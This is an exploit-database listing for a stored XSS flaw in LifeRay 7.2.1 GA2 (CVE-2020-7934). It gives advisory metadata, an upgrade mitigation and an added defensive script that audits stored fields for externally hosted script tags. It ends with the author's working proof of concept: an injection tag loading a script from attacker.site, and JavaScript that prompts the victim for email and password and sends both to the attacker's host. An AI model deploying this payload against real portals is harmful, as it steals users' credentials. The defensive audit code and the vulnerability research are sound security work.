Vendor: LifeRay
By: 3ndG4me
CVSS: 5.4 (MEDIUM)
Stored XSS
CWE: 79
Product Name: LifeRay
Affected Version From: 7.1.2000
Affected Version To: 7.2.1 GA2
Patch Exists: NO
Related CVE: CVE-2020-7934
CPE: a:liferay:liferay:7.1.0
Platforms Tested: Debian Linux
2020

LifeRay 7.2.1 GA2 – Stored XSS

This exploit lets an attacker store malicious JavaScript in a vulnerable field in LifeRay 7.2.1 GA2, where it executes in the browser of users who load the affected page. The proof of concept phishes user credentials by prompting them to enter their email and password, which are then logged to the console and sent to the attacker's website.

Mitigation:

Update to a version of LifeRay that is not affected by this vulnerability.
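
A defender-side check to pair with the upgrade, as an added example (not part of the original advisory or the PoC author's code): it audits stored field values for script tags loaded from a foreign host, the form the PoC's injection tag takes, and shows output encoding rendering that tag inert. The hostname `portal.example.com`, the record layout and the sample values are constructed assumptions.

```javascript
// Added example: audit stored values for externally hosted <script> tags and
// neutralise them at render time. Regex scan is a heuristic, not an HTML parser.
const SITE_HOST = "portal.example.com"; // assumption: the portal's own hostname

// Return every <script src=...> whose source resolves to a host other than ours.
// Case-insensitive; resolves protocol-relative ("//host/x") and relative URLs.
function findExternalScripts(value, siteHost = SITE_HOST) {
  const hits = [];
  const tagRe = /<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  for (const m of value.matchAll(tagRe)) {
    const src = m[1] ?? m[2] ?? m[3];
    let host;
    try {
      host = new URL(src, `https://${siteHost}/`).hostname;
    } catch {
      host = null; // unparseable src: report it rather than skip it
    }
    if (host !== siteHost) hits.push({ src, host });
  }
  return hits;
}

// Output encoding for HTML text context: markup in stored data renders as text.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed sample records (field names and paths are hypothetical).
const storedRecords = [
  { id: 1, field: "title", value: "Quarterly report" },
  { id: 2, field: "title", value: '<SCRIPT SRC="//attacker.site/cve-2020-7934.js">' },
  { id: 3, field: "body", value: '<script src="/js/main.js"></script>' },
];

// Keep only the records that contain at least one foreign-host script tag.
function auditRecords(records) {
  return records
    .map((r) => ({ id: r.id, field: r.field, hits: findExternalScripts(r.value) }))
    .filter((r) => r.hits.length > 0);
}

for (const finding of auditRecords(storedRecords)) {
  console.log(`record ${finding.id} (${finding.field}):`, finding.hits);
}
console.log(escapeHtml(storedRecords[1].value));
```

A check that only looks for `http` in the `src` value would miss the protocol-relative form, which is why the source is resolved against the site's own origin before the hosts are compared.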

Exploit-DB raw data:

# Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS
# Date: 10/05/2020 
# Exploit Author: 3ndG4me
# Vendor Homepage: https://www.liferay.com/
# Software Link: https://www.liferay.com/
# Version: 7.1.0 -> 7.2.1 GA2 (REQUIRED)
# Tested on: Debian Linux
# CVE : CVE-2020-7934
# Public Exploit/Whitepaper: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934

# NOTE: The attached proof of concept is a javascript payload, submitted as a ".txt" file to attach via email as ".js" is often blocked.

// CVE-2020-7934 Cred Phishing Example Attack
// Author: 3ndG4me
// Github: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934

// Host this payload with your site and paste in this script tag into a vulnerable field with your URL replaced where relevant:
// <SCRIPT SRC="//attacker.site/cve-2020-7934.js">

var email = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your email:", "");
var password = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your password:", "");


console.log(email);
console.log(password);

var url = "http://attacker.site/" + email + ":" + password;

$.get(url);